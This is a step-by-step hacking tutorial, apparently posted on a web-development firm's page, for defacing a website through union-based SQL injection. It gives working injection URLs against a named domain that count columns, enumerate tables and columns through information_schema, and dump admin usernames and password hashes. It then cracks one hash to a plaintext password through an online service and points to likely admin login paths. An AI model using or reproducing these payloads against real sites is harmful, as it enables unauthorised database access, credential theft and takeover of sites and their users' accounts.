
Step by Step to Deface Site with SQL Injection

What is SQL injection?


SQL stands for Structured Query Language. It is a high-level, declarative language, close to how a human describes what they want: the SELECT, INSERT, DELETE and UPDATE statements read, add, delete and update data respectively. SQL is used to define and query databases, and an application's information is stored in those databases. SQL injection is a vulnerability in the application's data-access layer that lets an attacker change the SQL statement the application sends to its database, and so read (and often modify) the database contents. It occurs when user input is placed into a query without being filtered, or with filtering that is incomplete. A typical injection point is a page that takes a parameter from the URL, in the format:

www.klatenweb.com/something.php?something=something

Some basics:

Every database server hosts one or more databases. Every database contains tables, every table has columns, and the data itself is stored as rows of values in those columns.




  

We have chosen the database "explore_hacking" from the six databases on this server. It has four tables: admin, articles, products and subscribers. Each table in turn has columns, with the data stored in them. For example, the 'admin' table has the columns id, username, password and email.

What is information_schema?

It is a read-only information database that MySQL creates by default in version 5.0 and later (earlier releases do not have it, and other database engines use different catalog tables). It holds metadata such as the names of the tables and columns in every other database on the server, which is what makes the enumeration below possible.



We have opened the database "information_schema", which is present by default, and the table named "TABLES" inside it.


 

Step 1. Find the number of columns.

Let's use the "ORDER BY" clause here. It sorts the result rows by a column, and the column may be given by position, so ORDER BY 10 means "sort by the 10th column of the result". If the query has fewer than 10 columns the database raises an error, and that error is what we test for. Choose any number, say 10; here I have assumed the query cannot have more than 10 columns. "--" starts a comment, so everything after it (the rest of the application's original query) is ignored. Note that MySQL only treats "--" as a comment when it is followed by whitespace; a trailing space is usually lost from a URL, so in practice "--+" or "-- -" is sent (the "+" decodes to a space), or "#" (URL-encoded as %23) is used instead.
Now go to this URL


http://www.klatenweb.com/news/news.php?id=130 order by 10--


We actually instructed it to sort the result by the 10th column, and it returned an error, which means there are fewer than 10 columns. Lower the number one at a time (9, 8, ...) until the page loads normally again; the first number that works is the column count. In this example the error disappears at 6, so the query has six columns, which is why the next step uses six values.

 

Step 2. Find vulnerable columns.

Now let's append a second "SELECT" with "UNION" (the "UNION SELECT ALL" below is MySQL's UNION followed by SELECT ALL, i.e. no de-duplication of rows). Remember to put a dash (-) before 130: no article has the id -130, so the application's own SELECT returns no row, and the only row the page can render is the one produced by our UNION SELECT. The number of values must equal the column count found in step 1.


http://www.klatenweb.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--


We get a couple of numbers on screen. Only the columns that the page template actually renders appear, and those are the "vulnerable" (usable) columns: whatever we place in them is echoed back to us. In this case the most usable one is column 2.

 

Step 3. Find the database version.


Replace the most vulnerable column with "@@version" or "version()" (if the first one doesn't work).


http://www.klatenweb.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6--


We get the version on screen. The only thing to note is that it is 5.x, i.e. MySQL 5.0 or later. Had it been lower than 5 we would have needed a different approach, because those releases have no default database like "information_schema" that stores information about the tables and columns of the other databases; table and column names would then have to be guessed.

 

Step 4. Finding table names.


Replace the vulnerable column number with "table_name" and select it from information_schema.tables; "table_schema=database()" restricts the listing to the database the application is currently connected to.


http://www.klatenweb.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()--


We get the first table name on the screen. The page renders only one row, so only one name is visible at a time.


 

To get all the tables in one go, use group_concat, which joins the value from every row into a single comma-separated string. (MySQL truncates the result at group_concat_max_len, 1024 bytes by default, so a very long list may be cut off.)

http://www.klatenweb.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--

 

Step 5. Finding column names.


Similarly, get all the columns by replacing 'tables' with 'columns' and 'table_name' with 'column_name':


http://www.klatenweb.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--


This lists the columns of every table in the database, in table order, so a repeating element such as 'id' (typically the first column of each table) marks where one table's columns end and the next table's begin. From that we can tell which table has which columns. To see the columns of one table unambiguously, add "and table_name='tar_admin'" to the WHERE clause.

 

 

Step 6. Fetching data from columns.


We can now fetch the data stored in any column, but the interesting ones here are username and password. These columns are in the first table, tar_admin. "0x3a" is the hexadecimal notation for a colon (ASCII 0x3A); MySQL accepts a hex literal as a string, so it is simply a way to insert a separator between username and password in the output without putting quote characters in the URL.

http://www.klatenweb.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--



So finally we have the usernames and passwords on screen. But the passwords are not stored in clear text: the 32-character hexadecimal values have the shape of unsalted MD5 hashes, and unsalted hashes of common passwords can usually be recovered by lookup. Let's choose any username, say "Sneds". Its hashed password is
7d372d3f4ad3116c9e455b20e946dd15. Let's go to

http://md5crack.com/crackmd5.php and put the hashed password there.


And it cracks it for us: the result is 'oorwullie', the password in clear text.

 



Note: hashes are not encryption. A hash is a one-way function and cannot be reversed; online "crackers" work by looking the hash up in a precomputed table of common passwords, or by hashing guesses until one matches. There are countless such services available, so keep trying. A long, unique password, or one stored with a salt and a slow hash, usually cannot be cracked this way.
 

 

Where is the login panel or login page of the website?


So you have the key; where is the lock? Most websites keep their login page at a default location. For a site such as www.klatenweb.com, the login page would typically be at
www.klatenweb.com/admin, www.klatenweb.com/administrator, www.klatenweb.com/adminlogin, etc.

 



About KLATENWEB

Web application development services based on PHP and MySQL: web portals, personal sites, online shops, academic information systems, personnel (SIMPeg) and hospital information systems, Facebook applications and more, as well as cheap unlimited domain and hosting.